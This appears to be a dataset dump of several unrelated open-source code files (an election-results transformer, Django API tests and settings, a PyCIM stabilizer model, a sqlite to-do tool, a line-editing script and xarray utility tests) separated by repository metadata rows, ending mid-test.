dest_dict["partido_99"]["c_%02d" % (comuna)] = a99
dest_dict["partido_00"]["c_%02d" % (comuna)] = a00
def t_sort_results_API(d_d=None):
''' sort the results by descending percentage
taking into account special parties at the bottom'''
for k, v in d_d.iteritems():
if k == "resumen":
continue
if k == "partido_00":
sort_results_by_percentage(v, special=True)
else:
sort_results_by_percentage(v, special=False)
def t_results_API(origin_list=None, dest_dict=None):
'''main transformation
we need to switch from section based driven data
to political party driven data'''
for i, v in enumerate(origin_list):
log.debug("transform results for section %s" % (i))
t_results_section_API(v, i, dest_dict)
# Sort special party results
t_sort_results_API(dest_dict)
# Write to file to preview intermediate result
# to_json("datos_completos",dest_dict)
# QeQ candidates transformations
def t_candidates_percentage(d=None):
'''Transform candidates percentage for piece automation'''
try:
data = d[0]["general"][0]["partidos"]
except (KeyError, IndexError), e:
log.error("Error getting data from memory. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result = {}
cand_list = []
for row in data:
# Skip special political parties
try:
if row["id_partido"] in SPECIAL_PARTIES:
continue
if (float(row["pct"]) >= PASS_THRESHOLD):
party_passed = True
else:
party_passed = False
# Get maximum number of votes for a party primary
max_v = int(max(row["listas"],
key=lambda x: int(x["votos"]))["votos"])
for c_d in row["listas"]:
tmp_cand = {"id": c_d["id_candidato"],
"p": format_percentage(c_d["pct_total"]),
"g": "1" if (int(c_d["votos"]) == max_v) else "0",
"pp": "1" if party_passed else "0"}
cand_list.append(tmp_cand)
except (KeyError, ValueError, IndexError), e:
log.error("Failed to get the candidate percentage. Reason: %s"
% (str(e)))
raise Paso2015(__name__)
# Order candidate list by descending percentage
cand_list.sort(key=lambda x: float(x['p']), reverse=True)
result["candidatos"] = cand_list
return result
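# Output shape sketch (hypothetical values):
#   {"candidatos": [{"id": "101", "p": "12.34", "g": "1", "pp": "1"}, ...]}
# where g flags the candidate with the most votes within the party primary
# and pp whether the party cleared PASS_THRESHOLD.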
# Front page ranking transformations
def t_ranking(d_d=None):
'''Transformation to obtain the ranking data for
the front page'''
try:
data_parties = d_d["partido_00"]["c_00"]
data_summary = d_d["resumen"]
except KeyError, e:
log.error("Error getting data from memory. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result = {}
# Get the summary of avaible voting tables
result["mp"] = data_summary["mp"]
# Get the top three parties
parties_list = []
try:
for row in data_parties[0:3]:
party = {"id": row["id"], "p": row["p"]}
candidates_list = []
try:
data_primary = d_d["partido_%s" % (row["id"])]["c_00"]
for c in data_primary[0:2]:
candidates_list.append({"id": c["id"], "pt": c["pt"]})
except KeyError:
                # Did not find the party on its own key; look it up among
                # the "listas únicas" (partido_99), matching on the party id
                try:
                    data_primary = d_d["partido_99"]["c_00"]
                    # Inside "listas únicas" there is only one percentage
                    # per party, so that entry's value is used as the total
                    for c in data_primary:
                        if c["id"] == row["id"]:
                            candidates_list.append({"id": c["id"], "pt": c["p"]})
                            break
except (KeyError, ValueError, IndexError), e:
log.error("Did not find the party. Reason %s"
% (str(e)))
raise Paso2015(__name__)
party["candidatos"] = candidates_list
parties_list.append(party)
except IndexError, e:
log.error("Did not find at least 3 parties. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result["partidos"] = parties_list
return result
|
mit
| 3,808,144,704,324,429,300
| 34.235772
| 79
| 0.524919
| false
| 3.675997
| false
| false
| false
|
eaudeweb/lcc-toolkit
|
lcc/tests/answer.py
|
1
|
6176
|
import json
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from lcc.models import (
Answer, Assessment, Country, Question
)
from lcc.serializers import AnswerSerializer
from lcc.tests.taxonomy import create_taxonomy_classication
class GetAnswersTest(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', 'user@test.com', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ROU', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.question_2 = Question.objects.create(
text="Question 2 text", parent=None,
order=2, classification=self.classification)
self.question_3 = Question.objects.create(
text="Question 3 text", parent=self.question_1,
order=1, classification=self.classification)
self.question_4 = Question.objects.create(
text="Question 4 text", parent=self.question_2,
order=1, classification=self.classification)
self.answer_1 = Answer.objects.create(
assessment=self.assessment, question=self.question_1, value=True)
self.answer_2 = Answer.objects.create(
assessment=self.assessment, question=self.question_2, value=True)
self.answer_3 = Answer.objects.create(
assessment=self.assessment, question=self.question_3, value=False)
def test_get_all_answers(self):
response = self.client.get(reverse('lcc:api:answers_list_create'))
answers = Answer.objects.all()
serializer = AnswerSerializer(answers, many=True)
json_res = json.loads(response.content.decode())
json_ser = json.loads(json.dumps(serializer.data))
self.assertEqual(json_res, json_ser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_single_answer(self):
response = self.client.get(
reverse('lcc:api:answers_get_update', args=[self.answer_1.pk]))
serializer = AnswerSerializer(self.answer_1)
json_res = json.loads(response.content.decode())
json_ser = json.loads(json.dumps(serializer.data))
self.assertEqual(json_res, json_ser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_invalid_single_answer(self):
response = self.client.get(
reverse('lcc:api:answers_get_update', args=[100]),
expect_errors=True
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class CreateAnswersTest(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', 'user@test.com', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ro', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.answer_valid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": True
}
self.answer_invalid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": None
}
def test_create_valid_answer(self):
response = self.client.post(
reverse('lcc:api:answers_list_create'),
json.dumps(self.answer_valid_payload),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_invalid_answer(self):
response = self.client.post(
reverse('lcc:api:answers_list_create'),
json.dumps(self.answer_invalid_payload),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class UpdateSingleAnswer(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', 'user@test.com', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ROU', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.answer_1 = Answer.objects.create(
assessment=self.assessment, question=self.question_1, value=True)
self.answer_valid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": not self.answer_1.value
}
self.answer_invalid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": None
}
def test_valid_update_answer(self):
response = self.client.put(
reverse('lcc:api:answers_get_update', args=[self.answer_1.pk]),
json.dumps({
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": False
}),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
|
gpl-3.0
| 359,729,923,295,122,600
| 37.842767
| 78
| 0.628886
| false
| 3.981947
| true
| false
| false
|
rwl/PyCIM
|
CIM14/IEC61970/Dynamics/PowerSystemStabilizers/PssIEEE2B.py
|
1
|
7134
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Dynamics.PowerSystemStabilizers.PowerSystemStabilizer import PowerSystemStabilizer
class PssIEEE2B(PowerSystemStabilizer):
"""IEEE (2005) PSS2B Model This stabilizer model is designed to represent a variety of dual-input stabilizers, which normally use combinations of power and speed or frequency to derive the stabilizing signal.
"""
def __init__(self, t11=0.0, vsi1max=0.0, t3=0.0, tw3=0.0, vstmax=0.0, t2=0.0, n=0, vsi1min=0.0, t9=0.0, ks2=0.0, vstmin=0.0, j1=0, tw1=0.0, tb=0.0, t7=0.0, vsi2max=0.0, t6=0.0, t1=0.0, m=0, vsi2min=0.0, a=0.0, t4=0.0, tw4=0.0, ks4=0.0, ta=0.0, ks3=0.0, t10=0.0, tw2=0.0, j2=0, ks1=0.0, t8=0.0, *args, **kw_args):
"""Initialises a new 'PssIEEE2B' instance.
@param t11: Lead/lag time constant
@param vsi1max: Input signal #1 max limit
@param t3: Lead/lag time constant
@param tw3: First washout on signal #2
@param vstmax: Stabilizer output max limit
@param t2: Lead/lag time constant
@param n: Order of ramp tracking filter
@param vsi1min: Input signal #1 min limit
@param t9: Lag of ramp tracking filter
@param ks2: Gain on signal #2
@param vstmin: Stabilizer output min limit
@param j1: Input signal #1 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
@param tw1: First washout on signal #1
@param tb: Lag time constant
@param t7: Time constant on signal #2
@param vsi2max: Input signal #2 max limit
@param t6: Time constant on signal #1
@param t1: Lead/lag time constant
@param m: Denominator order of ramp tracking filter
@param vsi2min: Input signal #2 min limit
@param a: Numerator constant
@param t4: Lead/lag time constant
@param tw4: Second washout on signal #2
@param ks4: Gain on signal #2 input after ramp-tracking filter
@param ta: Lead constant
@param ks3: Gain on signal #2 input before ramp-tracking filter
@param t10: Lead/lag time constant
@param tw2: Second washout on signal #1
@param j2: Input signal #2 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
@param ks1: Stabilizer gain
@param t8: Lead of ramp tracking filter
"""
#: Lead/lag time constant
self.t11 = t11
#: Input signal #1 max limit
self.vsi1max = vsi1max
#: Lead/lag time constant
self.t3 = t3
#: First washout on signal #2
self.tw3 = tw3
#: Stabilizer output max limit
self.vstmax = vstmax
#: Lead/lag time constant
self.t2 = t2
#: Order of ramp tracking filter
self.n = n
#: Input signal #1 min limit
self.vsi1min = vsi1min
#: Lag of ramp tracking filter
self.t9 = t9
#: Gain on signal #2
self.ks2 = ks2
#: Stabilizer output min limit
self.vstmin = vstmin
#: Input signal #1 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
self.j1 = j1
#: First washout on signal #1
self.tw1 = tw1
#: Lag time constant
self.tb = tb
#: Time constant on signal #2
self.t7 = t7
#: Input signal #2 max limit
self.vsi2max = vsi2max
#: Time constant on signal #1
self.t6 = t6
#: Lead/lag time constant
self.t1 = t1
#: Denominator order of ramp tracking filter
self.m = m
#: Input signal #2 min limit
self.vsi2min = vsi2min
#: Numerator constant
self.a = a
#: Lead/lag time constant
self.t4 = t4
#: Second washout on signal #2
self.tw4 = tw4
#: Gain on signal #2 input after ramp-tracking filter
self.ks4 = ks4
#: Lead constant
self.ta = ta
#: Gain on signal #2 input before ramp-tracking filter
self.ks3 = ks3
#: Lead/lag time constant
self.t10 = t10
#: Second washout on signal #1
self.tw2 = tw2
#: Input signal #2 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
self.j2 = j2
#: Stabilizer gain
self.ks1 = ks1
#: Lead of ramp tracking filter
self.t8 = t8
super(PssIEEE2B, self).__init__(*args, **kw_args)
_attrs = ["t11", "vsi1max", "t3", "tw3", "vstmax", "t2", "n", "vsi1min", "t9", "ks2", "vstmin", "j1", "tw1", "tb", "t7", "vsi2max", "t6", "t1", "m", "vsi2min", "a", "t4", "tw4", "ks4", "ta", "ks3", "t10", "tw2", "j2", "ks1", "t8"]
_attr_types = {"t11": float, "vsi1max": float, "t3": float, "tw3": float, "vstmax": float, "t2": float, "n": int, "vsi1min": float, "t9": float, "ks2": float, "vstmin": float, "j1": int, "tw1": float, "tb": float, "t7": float, "vsi2max": float, "t6": float, "t1": float, "m": int, "vsi2min": float, "a": float, "t4": float, "tw4": float, "ks4": float, "ta": float, "ks3": float, "t10": float, "tw2": float, "j2": int, "ks1": float, "t8": float}
_defaults = {"t11": 0.0, "vsi1max": 0.0, "t3": 0.0, "tw3": 0.0, "vstmax": 0.0, "t2": 0.0, "n": 0, "vsi1min": 0.0, "t9": 0.0, "ks2": 0.0, "vstmin": 0.0, "j1": 0, "tw1": 0.0, "tb": 0.0, "t7": 0.0, "vsi2max": 0.0, "t6": 0.0, "t1": 0.0, "m": 0, "vsi2min": 0.0, "a": 0.0, "t4": 0.0, "tw4": 0.0, "ks4": 0.0, "ta": 0.0, "ks3": 0.0, "t10": 0.0, "tw2": 0.0, "j2": 0, "ks1": 0.0, "t8": 0.0}
_enums = {}
_refs = []
_many_refs = []
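# Instantiation sketch (illustrative parameter values only, not taken from
# any published stabilizer tuning):
#   pss = PssIEEE2B(ks1=20.0, t1=0.16, t2=0.02, tw1=10.0, tw2=10.0,
#                   vstmax=0.1, vstmin=-0.1)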
|
mit
| -6,638,819,848,225,770,000
| 42.766871
| 448
| 0.614943
| false
| 3.162234
| false
| false
| false
|
nathanielksmith/done
|
done/Tasks.py
|
1
|
2607
|
# who nate smith
# when march 2010
# why the done tool
# where midwest usa
import sys
from time import mktime, time
from datetime import datetime
import sqlite3
from termcolor import colored
import sql_interp.sql_interp as si
from Config import db_path
class Task:
def __init__(self, desc, due):
self.desc = desc
self.si = si.SQLInterp()
self.db = sqlite3.connect(db_path)
self.c = self.db.cursor()
self.due = datetime.fromtimestamp(due) if due else None
def add(self):
insert = {
"desc" : self.desc,
"created" : time()
}
if self.due:
insert["due"] = mktime(self.due.timetuple())
interped = self.si.interp("INSERT INTO tasks", insert)
self.c.execute(interped[0], interped[1])
self.db.commit()
print "\t *", self
def done(self):
sys.stdout.write("\t * " + str(self) + "? ")
answer = raw_input("[dN]:")
if answer == "d":
self.finish()
return True
return False
def remove(self):
sys.stdout.write("\t * " + str(self) + "? ")
answer = raw_input("[rmN]:")
if answer == "rm":
self.delete()
return True
return False
def finish(self):
where = { "desc":self.desc }
interped = self.si.interp("UPDATE tasks SET done=1 WHERE", where)
self.c.execute(interped[0], interped[1])
self.db.commit()
def delete(self):
where = { "desc":self.desc }
interped = self.si.interp("DELETE FROM tasks WHERE", where)
self.c.execute(interped[0], interped[1])
self.db.commit()
def pretty_due(self):
if not self.due:
return ""
due_string = self.due.strftime("%a, %Y-%m-%d %X")
overdue = lambda s: colored(s, "white", "on_red")
red = lambda s: colored(s, "red")
yellow = lambda s: colored(s, "yellow")
green = lambda s: colored(s, "green")
now = datetime.now()
delta = self.due - now
if delta.days < 0: # overdue
due_string = overdue(due_string)
if delta.days == 0:
due_string = red(due_string)
if delta.days == 1:
due_string = yellow(due_string)
if delta.days > 1:
due_string = green(due_string)
return due_string
def __str__(self):
due_string = self.pretty_due()
return "%s %s" % (self.desc, due_string)
|
gpl-3.0
| -1,143,508,511,663,373,800
| 23.59434
| 73
| 0.519371
| false
| 3.666667
| false
| false
| false
|
neil92/MiscScripts2
|
replace_every_xth_line.py
|
1
|
1281
|
#!/usr/local/miniconda3/bin/python
import argparse
def setupArguments():
    """
    This is the function that sets up the flags and the arguments you can pass to the script.
    :author: Neil A. Patel
    """
    aParser = argparse.ArgumentParser("Setup the arguments.")
    aParser.add_argument('-f', '--file', action='store', dest='file_target', required=True,
                         help="This is the file that will have every xth character replaced.")
    aParser.add_argument("-o", "--output", action='store', dest='file_output', required=True,
                         help="This is the file that will be written out.")
    aParser.add_argument('-c', '--character', action='store', dest="target_character", required=False,
                         default="\n", help="This is an argument where you can specify which character you want to replace")
    aParser.add_argument("-p", "--period", action="store", dest="period", required=False,
                         default=2, type=int, help="The inverse of frequency. You want to replace the character every xth position.")
    return aParser.parse_args()
def main():
    args = setupArguments()
    with open(args.file_target) as file_target:
        with open(args.file_output, "w") as file_output:
            number_of_times_seen = 1
            for line in file_target:
                if number_of_times_seen == args.period:
                    # Assumed behaviour: remove the target character from
                    # every xth line, which for the default "\n" joins that
                    # line onto the next one
                    file_output.write(line.replace(args.target_character, ""))
                    number_of_times_seen = 1
                else:
                    file_output.write(line)
                    number_of_times_seen += 1
if __name__ == "__main__":
    main()
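# Usage sketch (hypothetical file names): join every 3rd line onto the
# following one by removing its trailing newline:
#   ./replace_every_xth_line.py -f notes.txt -o joined.txt -p 3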
|
mit
| -5,675,658,794,333,368,000
| 39.03125
| 105
| 0.674473
| false
| 3.713043
| false
| false
| false
|
bertnotbob/django-property
|
config/settings/base.py
|
1
|
4530
|
import dj_database_url, os
from django.core.exceptions import ImproperlyConfigured
def get_env_variable(var_name):
try:
return os.environ[var_name]
    except KeyError:
error_msg = 'Set the {} environment variable'.format(var_name)
raise ImproperlyConfigured(error_msg)
# Paths
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Secret Key
SECRET_KEY = get_env_variable('SECRET_KEY')
# Debug
DEBUG = True
# Allowed Hosts
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'homes',
'homes_for_sale',
'homes_to_let',
'homes_user',
'homes_agent',
'homes_json',
'homes_theme_default',
'django.contrib.humanize',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'mapwidgets',
'sorl.thumbnail',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Wsgi
WSGI_APPLICATION = 'config.wsgi.application'
# Database
DATABASES = {
'default': dj_database_url.config(conn_max_age=500)
}
DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.postgis'
# Password validation
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'debug_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, '../logs/debug.log') # Place outside of app location
},
'app_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, '../logs/app.log') # Place outside of app location
},
},
'loggers': {
'django': {
'handlers': ['debug_file'],
'level': 'DEBUG',
'propagate': True,
},
'app': {
'handlers': ['app_file'],
'level': 'DEBUG',
'propagate': True,
}
},
}
# Internationalization
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# AWS
AWS_STORAGE_BUCKET_NAME = get_env_variable('AWS_STORAGE_BUCKET_NAME')
AWS_ACCESS_KEY_ID = get_env_variable('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = get_env_variable('AWS_SECRET_ACCESS_KEY')
AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME
# Static files
STATICFILES_LOCATION = 'static'
STATICFILES_STORAGE = 'config.custom_storages.StaticStorage'
STATIC_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)
# Media files
MEDIAFILES_LOCATION = 'media'
MEDIA_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)
DEFAULT_FILE_STORAGE = 'config.custom_storages.MediaStorage'
# Accounts
ACCOUNT_ACTIVATION_DAYS = 7
# User settings
LOGIN_REDIRECT_URL = '/user/dashboard/'
# Google
GOOGLE_MAPS_API_KEY=get_env_variable('GOOGLE_MAPS_API_KEY')
# Email
EMAIL_HOST = get_env_variable('EMAIL_HOST')
EMAIL_HOST_USER = get_env_variable('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = get_env_variable('EMAIL_HOST_PASSWORD')
EMAIL_PORT = get_env_variable('EMAIL_PORT')
|
mit
| 5,718,639,544,731,947,000
| 25.343023
| 99
| 0.641501
| false
| 3.498069
| true
| false
| false
|
pydata/xarray
|
xarray/tests/test_utils.py
|
1
|
10440
|
from datetime import datetime
from typing import Hashable
import numpy as np
import pandas as pd
import pytest
from xarray.coding.cftimeindex import CFTimeIndex
from xarray.core import duck_array_ops, utils
from xarray.core.indexes import PandasIndex
from xarray.core.utils import either_dict_or_kwargs, iterate_nested
from . import assert_array_equal, requires_cftime, requires_dask
from .test_coding_times import _all_cftime_date_types
class TestAlias:
def test(self):
def new_method():
pass
old_method = utils.alias(new_method, "old_method")
assert "deprecated" in old_method.__doc__
with pytest.warns(Warning, match="deprecated"):
old_method()
def test_safe_cast_to_index():
dates = pd.date_range("2000-01-01", periods=10)
x = np.arange(5)
td = x * np.timedelta64(1, "D")
midx = pd.MultiIndex.from_tuples([(0,)], names=["a"])
for expected, array in [
(dates, dates.values),
(pd.Index(x, dtype=object), x.astype(object)),
(pd.Index(td), td),
(pd.Index(td, dtype=object), td.astype(object)),
(midx, PandasIndex(midx)),
]:
actual = utils.safe_cast_to_index(array)
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
@pytest.mark.parametrize(
"a, b, expected", [["a", "b", np.array(["a", "b"])], [1, 2, pd.Index([1, 2])]]
)
def test_maybe_coerce_to_str(a, b, expected):
a = np.array([a])
b = np.array([b])
index = pd.Index(a).append(pd.Index(b))
actual = utils.maybe_coerce_to_str(index, [a, b])
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
def test_maybe_coerce_to_str_minimal_str_dtype():
a = np.array(["a", "a_long_string"])
index = pd.Index(["a"])
actual = utils.maybe_coerce_to_str(index, [a])
expected = np.array("a")
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
@requires_cftime
def test_safe_cast_to_index_cftimeindex():
date_types = _all_cftime_date_types()
for date_type in date_types.values():
dates = [date_type(1, 1, day) for day in range(1, 20)]
expected = CFTimeIndex(dates)
actual = utils.safe_cast_to_index(np.array(dates))
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
assert isinstance(actual, type(expected))
# Test that datetime.datetime objects are never used in a CFTimeIndex
@requires_cftime
def test_safe_cast_to_index_datetime_datetime():
dates = [datetime(1, 1, day) for day in range(1, 20)]
expected = pd.Index(dates)
actual = utils.safe_cast_to_index(np.array(dates))
assert_array_equal(expected, actual)
assert isinstance(actual, pd.Index)
def test_multiindex_from_product_levels():
result = utils.multiindex_from_product_levels(
[pd.Index(["b", "a"]), pd.Index([1, 3, 2])]
)
np.testing.assert_array_equal(
result.codes, [[0, 0, 0, 1, 1, 1], [0, 1, 2, 0, 1, 2]]
)
np.testing.assert_array_equal(result.levels[0], ["b", "a"])
np.testing.assert_array_equal(result.levels[1], [1, 3, 2])
other = pd.MultiIndex.from_product([["b", "a"], [1, 3, 2]])
np.testing.assert_array_equal(result.values, other.values)
def test_multiindex_from_product_levels_non_unique():
result = utils.multiindex_from_product_levels(
[pd.Index(["b", "a"]), pd.Index([1, 1, 2])]
)
np.testing.assert_array_equal(
result.codes, [[0, 0, 0, 1, 1, 1], [0, 0, 1, 0, 0, 1]]
)
np.testing.assert_array_equal(result.levels[0], ["b", "a"])
np.testing.assert_array_equal(result.levels[1], [1, 2])
class TestArrayEquiv:
def test_0d(self):
        # verify our workaround for pd.isnull not working for 0-dimensional
        # object arrays
assert duck_array_ops.array_equiv(0, np.array(0, dtype=object))
assert duck_array_ops.array_equiv(np.nan, np.array(np.nan, dtype=object))
assert not duck_array_ops.array_equiv(0, np.array(1, dtype=object))
class TestDictionaries:
@pytest.fixture(autouse=True)
def setup(self):
self.x = {"a": "A", "b": "B"}
self.y = {"c": "C", "b": "B"}
self.z = {"a": "Z"}
def test_equivalent(self):
assert utils.equivalent(0, 0)
assert utils.equivalent(np.nan, np.nan)
assert utils.equivalent(0, np.array(0.0))
assert utils.equivalent([0], np.array([0]))
assert utils.equivalent(np.array([0]), [0])
assert utils.equivalent(np.arange(3), 1.0 * np.arange(3))
assert not utils.equivalent(0, np.zeros(3))
def test_safe(self):
# should not raise exception:
utils.update_safety_check(self.x, self.y)
def test_unsafe(self):
with pytest.raises(ValueError):
utils.update_safety_check(self.x, self.z)
def test_compat_dict_intersection(self):
assert {"b": "B"} == utils.compat_dict_intersection(self.x, self.y)
assert {} == utils.compat_dict_intersection(self.x, self.z)
def test_compat_dict_union(self):
assert {"a": "A", "b": "B", "c": "C"} == utils.compat_dict_union(self.x, self.y)
with pytest.raises(
ValueError,
match=r"unsafe to merge dictionaries without "
"overriding values; conflicting key",
):
utils.compat_dict_union(self.x, self.z)
def test_dict_equiv(self):
x = {}
x["a"] = 3
x["b"] = np.array([1, 2, 3])
y = {}
y["b"] = np.array([1.0, 2.0, 3.0])
y["a"] = 3
assert utils.dict_equiv(x, y) # two nparrays are equal
y["b"] = [1, 2, 3] # np.array not the same as a list
assert utils.dict_equiv(x, y) # nparray == list
x["b"] = [1.0, 2.0, 3.0]
assert utils.dict_equiv(x, y) # list vs. list
x["c"] = None
assert not utils.dict_equiv(x, y) # new key in x
x["c"] = np.nan
y["c"] = np.nan
assert utils.dict_equiv(x, y) # as intended, nan is nan
x["c"] = np.inf
y["c"] = np.inf
assert utils.dict_equiv(x, y) # inf == inf
y = dict(y)
assert utils.dict_equiv(x, y) # different dictionary types are fine
y["b"] = 3 * np.arange(3)
assert not utils.dict_equiv(x, y) # not equal when arrays differ
def test_frozen(self):
x = utils.Frozen(self.x)
with pytest.raises(TypeError):
x["foo"] = "bar"
with pytest.raises(TypeError):
del x["a"]
with pytest.raises(AttributeError):
x.update(self.y)
assert x.mapping == self.x
assert repr(x) in (
"Frozen({'a': 'A', 'b': 'B'})",
"Frozen({'b': 'B', 'a': 'A'})",
)
def test_repr_object():
obj = utils.ReprObject("foo")
assert repr(obj) == "foo"
assert isinstance(obj, Hashable)
assert not isinstance(obj, str)
def test_repr_object_magic_methods():
o1 = utils.ReprObject("foo")
o2 = utils.ReprObject("foo")
o3 = utils.ReprObject("bar")
o4 = "foo"
assert o1 == o2
assert o1 != o3
assert o1 != o4
assert hash(o1) == hash(o2)
assert hash(o1) != hash(o3)
assert hash(o1) != hash(o4)
def test_is_remote_uri():
assert utils.is_remote_uri("http://example.com")
assert utils.is_remote_uri("https://example.com")
assert not utils.is_remote_uri(" http://example.com")
assert not utils.is_remote_uri("example.nc")
class Test_is_uniform_and_sorted:
def test_sorted_uniform(self):
assert utils.is_uniform_spaced(np.arange(5))
def test_sorted_not_uniform(self):
assert not utils.is_uniform_spaced([-2, 1, 89])
def test_not_sorted_uniform(self):
assert not utils.is_uniform_spaced([1, -1, 3])
def test_not_sorted_not_uniform(self):
assert not utils.is_uniform_spaced([4, 1, 89])
def test_two_numbers(self):
assert utils.is_uniform_spaced([0, 1.7])
def test_relative_tolerance(self):
assert utils.is_uniform_spaced([0, 0.97, 2], rtol=0.1)
class Test_hashable:
def test_hashable(self):
for v in [False, 1, (2,), (3, 4), "four"]:
assert utils.hashable(v)
for v in [[5, 6], ["seven", "8"], {9: "ten"}]:
assert not utils.hashable(v)
@requires_dask
def test_dask_array_is_scalar():
# regression test for GH1684
import dask.array as da
y = da.arange(8, chunks=4)
assert not utils.is_scalar(y)
def test_hidden_key_dict():
hidden_key = "_hidden_key"
data = {"a": 1, "b": 2, hidden_key: 3}
data_expected = {"a": 1, "b": 2}
hkd = utils.HiddenKeyDict(data, [hidden_key])
assert len(hkd) == 2
assert hidden_key not in hkd
for k, v in data_expected.items():
assert hkd[k] == v
with pytest.raises(KeyError):
hkd[hidden_key]
with pytest.raises(KeyError):
del hkd[hidden_key]
def test_either_dict_or_kwargs():
result = either_dict_or_kwargs(dict(a=1), None, "foo")
expected = dict(a=1)
assert result == expected
result = either_dict_or_kwargs(None, dict(a=1), "foo")
expected = dict(a=1)
assert result == expected
with pytest.raises(ValueError, match=r"foo"):
